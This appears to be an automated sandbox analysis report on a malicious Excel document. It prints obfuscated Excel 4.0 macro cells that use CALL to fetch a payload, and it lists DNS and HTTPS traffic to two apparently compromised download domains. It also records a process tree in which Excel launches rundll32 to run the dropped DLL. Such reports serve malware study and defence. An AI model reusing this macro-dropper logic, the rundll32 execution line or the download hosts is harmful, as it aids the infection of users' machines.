,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
                                                                                                                                                                                                                            ,,,=HALT(),,,,,,,,,,,,"=4984654+9846544+468464=CALL(Sheet2!AY107&""n"",Sheet2!AY108&""A"",Sheet2!AY118,before.3.21.42.sheet!AR49,Sheet2!AT114,before.3.21.42.sheet!AT39,0,0)=CALL(Sheet2!AY107&""n"",Sheet2!AY108&""A"",Sheet2!AY118,before.3.21.42.sheet!AR49,Sheet2!AT115,before.3.21.42.sheet!AT39&""1"",0,0)",,,,,,,,,,,,,,,=Sheet2!AW142(),,,,,,,,,,,,,,,,,,,,,U,J,",D",..\jordji.nbvt1R,J,l,L,C,l,D,C,R,o,B,e,w,B,g,n,,i,l,,s,o,,t,a,,e,d,0,r,T,,S,o,,e,F,,r,i,,ve,l,,r,e,,,

                                                                                                                                                                                                                            Network Behavior

                                                                                                                                                                                                                            Network Port Distribution

                                                                                                                                                                                                                            TCP Packets

                                                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                            May 4, 2021 13:51:42.397970915 CEST49732443192.168.2.4192.254.233.89
                                                                                                                                                                                                                            May 4, 2021 13:51:42.584335089 CEST44349732192.254.233.89192.168.2.4
                                                                                                                                                                                                                            May 4, 2021 13:51:42.584445000 CEST49732443192.168.2.4192.254.233.89
                                                                                                                                                                                                                            May 4, 2021 13:51:42.585644007 CEST49732443192.168.2.4192.254.233.89
                                                                                                                                                                                                                            May 4, 2021 13:51:42.770356894 CEST44349732192.254.233.89192.168.2.4
                                                                                                                                                                                                                            May 4, 2021 13:51:42.772543907 CEST44349732192.254.233.89192.168.2.4
                                                                                                                                                                                                                            May 4, 2021 13:51:42.772588015 CEST44349732192.254.233.89192.168.2.4
                                                                                                                                                                                                                            May 4, 2021 13:51:42.772615910 CEST44349732192.254.233.89192.168.2.4
                                                                                                                                                                                                                            May 4, 2021 13:51:42.772629976 CEST49732443192.168.2.4192.254.233.89
                                                                                                                                                                                                                            May 4, 2021 13:51:42.772715092 CEST49732443192.168.2.4192.254.233.89
                                                                                                                                                                                                                            May 4, 2021 13:51:42.788480043 CEST49732443192.168.2.4192.254.233.89
                                                                                                                                                                                                                            May 4, 2021 13:51:42.975387096 CEST44349732192.254.233.89192.168.2.4
                                                                                                                                                                                                                            May 4, 2021 13:51:42.975539923 CEST49732443192.168.2.4192.254.233.89
                                                                                                                                                                                                                            May 4, 2021 13:51:42.976416111 CEST49732443192.168.2.4192.254.233.89
                                                                                                                                                                                                                            May 4, 2021 13:51:43.201735020 CEST44349732192.254.233.89192.168.2.4
                                                                                                                                                                                                                            May 4, 2021 13:51:43.516244888 CEST44349732192.254.233.89192.168.2.4
                                                                                                                                                                                                                            May 4, 2021 13:51:43.516356945 CEST49732443192.168.2.4192.254.233.89
                                                                                                                                                                                                                            May 4, 2021 13:51:43.516750097 CEST44349732192.254.233.89192.168.2.4
                                                                                                                                                                                                                            May 4, 2021 13:51:43.516832113 CEST49732443192.168.2.4192.254.233.89
                                                                                                                                                                                                                            May 4, 2021 13:51:43.621296883 CEST49734443192.168.2.4192.185.5.2
                                                                                                                                                                                                                            May 4, 2021 13:51:43.782363892 CEST44349734192.185.5.2192.168.2.4
                                                                                                                                                                                                                            May 4, 2021 13:51:43.782493114 CEST49734443192.168.2.4192.185.5.2
                                                                                                                                                                                                                            May 4, 2021 13:51:43.783493996 CEST49734443192.168.2.4192.185.5.2
                                                                                                                                                                                                                            May 4, 2021 13:51:43.944354057 CEST44349734192.185.5.2192.168.2.4
                                                                                                                                                                                                                            May 4, 2021 13:51:44.058368921 CEST44349734192.185.5.2192.168.2.4
                                                                                                                                                                                                                            May 4, 2021 13:51:44.058418989 CEST44349734192.185.5.2192.168.2.4
                                                                                                                                                                                                                            May 4, 2021 13:51:44.058444977 CEST44349734192.185.5.2192.168.2.4
                                                                                                                                                                                                                            May 4, 2021 13:51:44.058517933 CEST49734443192.168.2.4192.185.5.2
                                                                                                                                                                                                                            May 4, 2021 13:51:44.058648109 CEST49734443192.168.2.4192.185.5.2
                                                                                                                                                                                                                            May 4, 2021 13:51:44.072736025 CEST49734443192.168.2.4192.185.5.2
                                                                                                                                                                                                                            May 4, 2021 13:51:44.235205889 CEST44349734192.185.5.2192.168.2.4
                                                                                                                                                                                                                            May 4, 2021 13:51:44.236114025 CEST44349734192.185.5.2192.168.2.4
                                                                                                                                                                                                                            May 4, 2021 13:51:44.236186028 CEST49734443192.168.2.4192.185.5.2
                                                                                                                                                                                                                            May 4, 2021 13:51:44.237066031 CEST49734443192.168.2.4192.185.5.2
                                                                                                                                                                                                                            May 4, 2021 13:51:44.406100035 CEST44349734192.185.5.2192.168.2.4
                                                                                                                                                                                                                            May 4, 2021 13:51:44.406223059 CEST49734443192.168.2.4192.185.5.2
                                                                                                                                                                                                                            May 4, 2021 13:51:44.406393051 CEST44349734192.185.5.2192.168.2.4
                                                                                                                                                                                                                            May 4, 2021 13:51:44.406443119 CEST49734443192.168.2.4192.185.5.2
                                                                                                                                                                                                                            May 4, 2021 13:51:44.407274008 CEST49734443192.168.2.4192.185.5.2
                                                                                                                                                                                                                            May 4, 2021 13:51:44.411142111 CEST49736443192.168.2.4192.185.5.2
                                                                                                                                                                                                                            May 4, 2021 13:51:44.568136930 CEST44349734192.185.5.2192.168.2.4
                                                                                                                                                                                                                            May 4, 2021 13:51:44.575158119 CEST44349736192.185.5.2192.168.2.4
                                                                                                                                                                                                                            May 4, 2021 13:51:44.575300932 CEST49736443192.168.2.4192.185.5.2
                                                                                                                                                                                                                            May 4, 2021 13:51:44.575822115 CEST49736443192.168.2.4192.185.5.2
                                                                                                                                                                                                                            May 4, 2021 13:51:44.738636017 CEST44349736192.185.5.2192.168.2.4
                                                                                                                                                                                                                            May 4, 2021 13:51:44.739607096 CEST44349736192.185.5.2192.168.2.4
                                                                                                                                                                                                                            May 4, 2021 13:51:44.739692926 CEST49736443192.168.2.4192.185.5.2
                                                                                                                                                                                                                            May 4, 2021 13:51:44.740456104 CEST49736443192.168.2.4192.185.5.2
                                                                                                                                                                                                                            May 4, 2021 13:51:44.744724989 CEST49736443192.168.2.4192.185.5.2
                                                                                                                                                                                                                            May 4, 2021 13:51:44.910984993 CEST44349736192.185.5.2192.168.2.4
                                                                                                                                                                                                                            May 4, 2021 13:51:45.066790104 CEST44349736192.185.5.2192.168.2.4
                                                                                                                                                                                                                            May 4, 2021 13:51:45.066895008 CEST49736443192.168.2.4192.185.5.2
                                                                                                                                                                                                                            May 4, 2021 13:51:45.067207098 CEST44349736192.185.5.2192.168.2.4
                                                                                                                                                                                                                            May 4, 2021 13:51:45.067291975 CEST49736443192.168.2.4192.185.5.2
                                                                                                                                                                                                                            May 4, 2021 13:52:13.517757893 CEST44349732192.254.233.89192.168.2.4
                                                                                                                                                                                                                            May 4, 2021 13:52:15.121191978 CEST44349736192.185.5.2192.168.2.4

                                                                                                                                                                                                                            UDP Packets

                                                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                            May 4, 2021 13:51:23.770911932 CEST5057953192.168.2.48.8.8.8
                                                                                                                                                                                                                            May 4, 2021 13:51:23.822685003 CEST53505798.8.8.8192.168.2.4
                                                                                                                                                                                                                            May 4, 2021 13:51:24.408754110 CEST5170353192.168.2.48.8.8.8
                                                                                                                                                                                                                            May 4, 2021 13:51:24.451069117 CEST6524853192.168.2.48.8.8.8
                                                                                                                                                                                                                            May 4, 2021 13:51:24.460694075 CEST53517038.8.8.8192.168.2.4
                                                                                                                                                                                                                            May 4, 2021 13:51:24.499855042 CEST53652488.8.8.8192.168.2.4
                                                                                                                                                                                                                            May 4, 2021 13:51:24.871850967 CEST5372353192.168.2.48.8.8.8
                                                                                                                                                                                                                            May 4, 2021 13:51:24.872790098 CEST6464653192.168.2.48.8.8.8
                                                                                                                                                                                                                            May 4, 2021 13:51:24.873475075 CEST6529853192.168.2.48.8.8.8
                                                                                                                                                                                                                            May 4, 2021 13:51:24.920574903 CEST53537238.8.8.8192.168.2.4
                                                                                                                                                                                                                            May 4, 2021 13:51:24.921340942 CEST53646468.8.8.8192.168.2.4
                                                                                                                                                                                                                            May 4, 2021 13:51:24.930332899 CEST53652988.8.8.8192.168.2.4
                                                                                                                                                                                                                            May 4, 2021 13:51:26.248569012 CEST5912353192.168.2.48.8.8.8
                                                                                                                                                                                                                            May 4, 2021 13:51:26.300040960 CEST53591238.8.8.8192.168.2.4
                                                                                                                                                                                                                            May 4, 2021 13:51:26.867866039 CEST5453153192.168.2.48.8.8.8
                                                                                                                                                                                                                            May 4, 2021 13:51:26.925519943 CEST53545318.8.8.8192.168.2.4
                                                                                                                                                                                                                            May 4, 2021 13:51:27.516824961 CEST4971453192.168.2.48.8.8.8
                                                                                                                                                                                                                            May 4, 2021 13:51:27.565836906 CEST53497148.8.8.8192.168.2.4
                                                                                                                                                                                                                            May 4, 2021 13:51:28.863428116 CEST5802853192.168.2.48.8.8.8
                                                                                                                                                                                                                            May 4, 2021 13:51:28.912921906 CEST53580288.8.8.8192.168.2.4
                                                                                                                                                                                                                            May 4, 2021 13:51:30.235063076 CEST5309753192.168.2.48.8.8.8
                                                                                                                                                                                                                            May 4, 2021 13:51:30.283868074 CEST53530978.8.8.8192.168.2.4
                                                                                                                                                                                                                            May 4, 2021 13:51:30.653620005 CEST4925753192.168.2.48.8.8.8
                                                                                                                                                                                                                            May 4, 2021 13:51:30.714517117 CEST53492578.8.8.8192.168.2.4
                                                                                                                                                                                                                            May 4, 2021 13:51:36.179513931 CEST6238953192.168.2.48.8.8.8
                                                                                                                                                                                                                            May 4, 2021 13:51:36.228352070 CEST53623898.8.8.8192.168.2.4
                                                                                                                                                                                                                            May 4, 2021 13:51:37.300726891 CEST4991053192.168.2.48.8.8.8
                                                                                                                                                                                                                            May 4, 2021 13:51:37.367475986 CEST53499108.8.8.8192.168.2.4
                                                                                                                                                                                                                            May 4, 2021 13:51:37.384557962 CEST5585453192.168.2.48.8.8.8
                                                                                                                                                                                                                            May 4, 2021 13:51:37.436135054 CEST53558548.8.8.8192.168.2.4
                                                                                                                                                                                                                            May 4, 2021 13:51:37.836776018 CEST6454953192.168.2.48.8.8.8
                                                                                                                                                                                                                            May 4, 2021 13:51:37.895064116 CEST53645498.8.8.8192.168.2.4
                                                                                                                                                                                                                            May 4, 2021 13:51:38.851494074 CEST6454953192.168.2.48.8.8.8
                                                                                                                                                                                                                            May 4, 2021 13:51:38.909684896 CEST53645498.8.8.8192.168.2.4
                                                                                                                                                                                                                            May 4, 2021 13:51:39.868117094 CEST6454953192.168.2.48.8.8.8
                                                                                                                                                                                                                            May 4, 2021 13:51:39.925184011 CEST53645498.8.8.8192.168.2.4
                                                                                                                                                                                                                            May 4, 2021 13:51:41.884332895 CEST6454953192.168.2.48.8.8.8
                                                                                                                                                                                                                            May 4, 2021 13:51:41.945091963 CEST53645498.8.8.8192.168.2.4
                                                                                                                                                                                                                            May 4, 2021 13:51:42.338073015 CEST6315353192.168.2.48.8.8.8
                                                                                                                                                                                                                            May 4, 2021 13:51:42.395291090 CEST53631538.8.8.8192.168.2.4
                                                                                                                                                                                                                            May 4, 2021 13:51:42.634377956 CEST5299153192.168.2.48.8.8.8
                                                                                                                                                                                                                            May 4, 2021 13:51:42.686194897 CEST53529918.8.8.8192.168.2.4
                                                                                                                                                                                                                            May 4, 2021 13:51:43.559484959 CEST5370053192.168.2.48.8.8.8
                                                                                                                                                                                                                            May 4, 2021 13:51:43.617522955 CEST53537008.8.8.8192.168.2.4
                                                                                                                                                                                                                            May 4, 2021 13:51:43.832644939 CEST5172653192.168.2.48.8.8.8
                                                                                                                                                                                                                            May 4, 2021 13:51:43.884644032 CEST53517268.8.8.8192.168.2.4
                                                                                                                                                                                                                            May 4, 2021 13:51:45.062772036 CEST5679453192.168.2.48.8.8.8
                                                                                                                                                                                                                            May 4, 2021 13:51:45.111588955 CEST53567948.8.8.8192.168.2.4
                                                                                                                                                                                                                            May 4, 2021 13:51:45.887466908 CEST6454953192.168.2.48.8.8.8
                                                                                                                                                                                                                            May 4, 2021 13:51:45.936235905 CEST53645498.8.8.8192.168.2.4
                                                                                                                                                                                                                            May 4, 2021 13:51:45.974437952 CEST5653453192.168.2.48.8.8.8
                                                                                                                                                                                                                            May 4, 2021 13:51:46.024394035 CEST53565348.8.8.8192.168.2.4
                                                                                                                                                                                                                            May 4, 2021 13:51:49.420334101 CEST5662753192.168.2.48.8.8.8
                                                                                                                                                                                                                            May 4, 2021 13:51:49.471944094 CEST53566278.8.8.8192.168.2.4
                                                                                                                                                                                                                            May 4, 2021 13:51:50.248855114 CEST5662153192.168.2.48.8.8.8
                                                                                                                                                                                                                            May 4, 2021 13:51:50.297612906 CEST53566218.8.8.8192.168.2.4
                                                                                                                                                                                                                            May 4, 2021 13:51:51.124306917 CEST6311653192.168.2.48.8.8.8
                                                                                                                                                                                                                            May 4, 2021 13:51:51.174125910 CEST53631168.8.8.8192.168.2.4
                                                                                                                                                                                                                            May 4, 2021 13:51:52.499180079 CEST6407853192.168.2.48.8.8.8
                                                                                                                                                                                                                            May 4, 2021 13:51:52.548141956 CEST53640788.8.8.8192.168.2.4
                                                                                                                                                                                                                            May 4, 2021 13:51:53.303857088 CEST6480153192.168.2.48.8.8.8
                                                                                                                                                                                                                            May 4, 2021 13:51:53.362802029 CEST53648018.8.8.8192.168.2.4
                                                                                                                                                                                                                            May 4, 2021 13:51:54.351300001 CEST6172153192.168.2.48.8.8.8
                                                                                                                                                                                                                            May 4, 2021 13:51:54.400078058 CEST53617218.8.8.8192.168.2.4
                                                                                                                                                                                                                            May 4, 2021 13:51:55.241765022 CEST5125553192.168.2.48.8.8.8
                                                                                                                                                                                                                            May 4, 2021 13:51:55.293801069 CEST53512558.8.8.8192.168.2.4
                                                                                                                                                                                                                            May 4, 2021 13:51:56.163275003 CEST6152253192.168.2.48.8.8.8
                                                                                                                                                                                                                            May 4, 2021 13:51:56.215879917 CEST53615228.8.8.8192.168.2.4
                                                                                                                                                                                                                            May 4, 2021 13:51:56.981895924 CEST5233753192.168.2.48.8.8.8
                                                                                                                                                                                                                            May 4, 2021 13:51:57.030991077 CEST53523378.8.8.8192.168.2.4
                                                                                                                                                                                                                            May 4, 2021 13:51:57.949692965 CEST5504653192.168.2.48.8.8.8
                                                                                                                                                                                                                            May 4, 2021 13:51:57.983257055 CEST4961253192.168.2.48.8.8.8
                                                                                                                                                                                                                            May 4, 2021 13:51:57.998388052 CEST53550468.8.8.8192.168.2.4
                                                                                                                                                                                                                            May 4, 2021 13:51:58.031964064 CEST53496128.8.8.8192.168.2.4
                                                                                                                                                                                                                            May 4, 2021 13:52:00.440874100 CEST4928553192.168.2.48.8.8.8
                                                                                                                                                                                                                            May 4, 2021 13:52:00.503273964 CEST53492858.8.8.8192.168.2.4
                                                                                                                                                                                                                            May 4, 2021 13:52:18.715065002 CEST5060153192.168.2.48.8.8.8
                                                                                                                                                                                                                            May 4, 2021 13:52:18.777292013 CEST53506018.8.8.8192.168.2.4
                                                                                                                                                                                                                            May 4, 2021 13:52:18.881072998 CEST6087553192.168.2.48.8.8.8
                                                                                                                                                                                                                            May 4, 2021 13:52:18.936347008 CEST53608758.8.8.8192.168.2.4
                                                                                                                                                                                                                            May 4, 2021 13:52:31.497075081 CEST5644853192.168.2.48.8.8.8
                                                                                                                                                                                                                            May 4, 2021 13:52:31.554251909 CEST53564488.8.8.8192.168.2.4
                                                                                                                                                                                                                            May 4, 2021 13:52:45.285296917 CEST5917253192.168.2.48.8.8.8
                                                                                                                                                                                                                            May 4, 2021 13:52:45.348727942 CEST53591728.8.8.8192.168.2.4
                                                                                                                                                                                                                            May 4, 2021 13:53:12.643991947 CEST6242053192.168.2.48.8.8.8
                                                                                                                                                                                                                            May 4, 2021 13:53:12.749162912 CEST53624208.8.8.8192.168.2.4
                                                                                                                                                                                                                            May 4, 2021 13:53:13.826142073 CEST6057953192.168.2.48.8.8.8
                                                                                                                                                                                                                            May 4, 2021 13:53:13.883987904 CEST53605798.8.8.8192.168.2.4
                                                                                                                                                                                                                            May 4, 2021 13:53:15.278404951 CEST5018353192.168.2.48.8.8.8
                                                                                                                                                                                                                            May 4, 2021 13:53:15.378278971 CEST53501838.8.8.8192.168.2.4
                                                                                                                                                                                                                            May 4, 2021 13:53:15.958668947 CEST6153153192.168.2.48.8.8.8
                                                                                                                                                                                                                            May 4, 2021 13:53:16.016041040 CEST53615318.8.8.8192.168.2.4
                                                                                                                                                                                                                            May 4, 2021 13:53:16.772670984 CEST4922853192.168.2.48.8.8.8
                                                                                                                                                                                                                            May 4, 2021 13:53:16.890239954 CEST53492288.8.8.8192.168.2.4
                                                                                                                                                                                                                            May 4, 2021 13:53:18.237324953 CEST5979453192.168.2.48.8.8.8
                                                                                                                                                                                                                            May 4, 2021 13:53:18.294286966 CEST53597948.8.8.8192.168.2.4
                                                                                                                                                                                                                            May 4, 2021 13:53:18.820091963 CEST5591653192.168.2.48.8.8.8
                                                                                                                                                                                                                            May 4, 2021 13:53:18.881373882 CEST53559168.8.8.8192.168.2.4
                                                                                                                                                                                                                            May 4, 2021 13:53:19.637778997 CEST5275253192.168.2.48.8.8.8
                                                                                                                                                                                                                            May 4, 2021 13:53:19.686883926 CEST53527528.8.8.8192.168.2.4
                                                                                                                                                                                                                            May 4, 2021 13:53:20.667237043 CEST6054253192.168.2.48.8.8.8
                                                                                                                                                                                                                            May 4, 2021 13:53:20.727627039 CEST53605428.8.8.8192.168.2.4
                                                                                                                                                                                                                            May 4, 2021 13:53:21.416440010 CEST6068953192.168.2.48.8.8.8
                                                                                                                                                                                                                            May 4, 2021 13:53:21.476149082 CEST53606898.8.8.8192.168.2.4
                                                                                                                                                                                                                            May 4, 2021 13:53:21.845350981 CEST6420653192.168.2.48.8.8.8
                                                                                                                                                                                                                            May 4, 2021 13:53:21.919857025 CEST53642068.8.8.8192.168.2.4
                                                                                                                                                                                                                            May 4, 2021 13:53:39.652990103 CEST5090453192.168.2.48.8.8.8
                                                                                                                                                                                                                            May 4, 2021 13:53:39.727780104 CEST53509048.8.8.8192.168.2.4

                                                                                                                                                                                                                            DNS Queries

                                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                                                                            May 4, 2021 13:51:42.338073015 CEST192.168.2.48.8.8.80x7d0aStandard query (0)industrialarttextile.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                            May 4, 2021 13:51:43.559484959 CEST192.168.2.48.8.8.80x3eecStandard query (0)anaheimdermatologists.comA (IP address)IN (0x0001)

                                                                                                                                                                                                                            DNS Answers

                                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                                                                            May 4, 2021 13:51:42.395291090 CEST8.8.8.8192.168.2.40x7d0aNo error (0)industrialarttextile.com192.254.233.89A (IP address)IN (0x0001)
                                                                                                                                                                                                                            May 4, 2021 13:51:43.617522955 CEST8.8.8.8192.168.2.40x3eecNo error (0)anaheimdermatologists.com192.185.5.2A (IP address)IN (0x0001)

                                                                                                                                                                                                                            HTTPS Packets

                                                                                                                                                                                                                            TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                                                                                                                                            May 4, 2021 13:51:42.772615910 CEST192.254.233.89443192.168.2.449732CN=mail.gdmart.com.bd CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Wed Mar 10 10:47:11 CET 2021 Wed Oct 07 21:21:40 CEST 2020Tue Jun 08 11:47:11 CEST 2021 Wed Sep 29 21:21:40 CEST 2021771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                                                                                            CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021
                                                                                                                                                                                                                            May 4, 2021 13:51:44.058444977 CEST192.185.5.2443192.168.2.449734CN=cpcalendars.anaheimdermatologists.com CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Wed Mar 17 22:18:32 CET 2021 Wed Oct 07 21:21:40 CEST 2020Tue Jun 15 23:18:32 CEST 2021 Wed Sep 29 21:21:40 CEST 2021771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                                                                                            CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021

                                                                                                                                                                                                                            Code Manipulations

                                                                                                                                                                                                                            Statistics

                                                                                                                                                                                                                            Behavior

                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                            System Behavior

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Start time:13:51:36
                                                                                                                                                                                                                            Start date:04/05/2021
                                                                                                                                                                                                                            Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                            Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                                                                                                                                                                                                                            Imagebase:0xd20000
                                                                                                                                                                                                                            File size:27110184 bytes
                                                                                                                                                                                                                            MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:high

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Start time:13:51:45
                                                                                                                                                                                                                            Start date:04/05/2021
                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                            Commandline:rundll32 ..\jordji.nbvt1,DllRegisterServer
                                                                                                                                                                                                                            Imagebase:0x820000
                                                                                                                                                                                                                            File size:61952 bytes
                                                                                                                                                                                                                            MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:high

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Start time:13:51:45
                                                                                                                                                                                                                            Start date:04/05/2021
                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                            Commandline:rundll32 ..\jordji.nbvt11,DllRegisterServer
                                                                                                                                                                                                                            Imagebase:0x820000
                                                                                                                                                                                                                            File size:61952 bytes
                                                                                                                                                                                                                            MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:high

                                                                                                                                                                                                                            Disassembly

                                                                                                                                                                                                                            Code Analysis

                                                                                                                                                                                                                            Reset < >